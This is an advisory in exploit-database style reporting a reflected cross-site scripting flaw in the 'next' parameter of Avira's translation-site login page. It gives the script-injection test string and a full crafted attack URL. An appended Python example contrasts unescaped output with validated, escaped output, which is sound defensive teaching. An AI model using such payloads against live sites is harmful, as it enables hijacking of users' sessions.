translate.avira.com suffers from a cross-site scripting vulnerability.
# Exploit Title: AVIRA Subdomain XSS Vulnerability
# Google Dork: N/A
# Date: 2016/1/29
# Exploit Author: RootByte
# Vendor Homepage: http://translate.avira.com
# Software Link: N/A
# Version: N/A
# Tested on: Windows 10 / FireFox
# CVE : N/A
~ # Vulnerable Location: http://translate.avira.com/accounts/login/
~ # Variable: next
~ # Using this script for XSS Vulnerability Testing:
"><script>prompt(/RootByte/)</script>
~ # Our final address is
http://translate.avira.com/accounts/login/?csrfmiddlewaretoken=Ukv77qZZeG2BavIGaHNxcgJ6U4045erd&username=3383976&password=5478964&login=Login&language=ach&next="><script>prompt(/RootByte/)</script>
# Discovered by: RootByte
# Page: https://www.facebook.com/Rootbyte/
# Contact: https://www.facebook.com/groups/RootByte/
InfoSec Consultant / Web Pentester / Wannabe Security Researcher / JDM interested and Tacos addicted.
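
Added example (not part of the original advisory and not Avira's code): how a login view can handle the `next` parameter so the string above is not reflected as markup. It assumes `next` is echoed into a hidden form field, which the leading `">` of the test string suggests; the template and function names are hypothetical.

```python
import html
from urllib.parse import urlsplit

# Test string quoted from the advisory: it closes an attribute, then opens a tag.
PAGE_PAYLOAD = '"><script>prompt(/RootByte/)</script>'

# Hypothetical template for the login form's hidden field (assumed markup).
FIELD = '<input type="hidden" name="next" value="{}">'


def render_unescaped(next_value: str) -> str:
    """The flawed pattern: the parameter is copied into the attribute as-is."""
    return FIELD.format(next_value)


def safe_next(next_value: str, default: str = "/") -> str:
    """Accept only a local absolute path as the post-login redirect target."""
    if not next_value.startswith("/") or next_value.startswith("//"):
        return default
    if "\\" in next_value or any(ord(c) < 0x20 for c in next_value):
        return default
    parts = urlsplit(next_value)
    if parts.scheme or parts.netloc:
        return default
    return next_value


def render_hardened(next_value: str) -> str:
    """Validate the target, then HTML-escape it for the attribute context."""
    return FIELD.format(html.escape(safe_next(next_value), quote=True))


if __name__ == "__main__":
    # Constructed sample inputs, plus the string from the advisory.
    for value in (PAGE_PAYLOAD, "/projects/", "//other.example/x", '/a"><b>'):
        print(repr(value))
        print("  unescaped:", render_unescaped(value))
        print("  hardened: ", render_hardened(value))
```

The last sample shows why both steps are needed: a value can pass the local-path check and still contain quote and angle-bracket characters, so escaping at output time remains the control that keeps it inside the attribute.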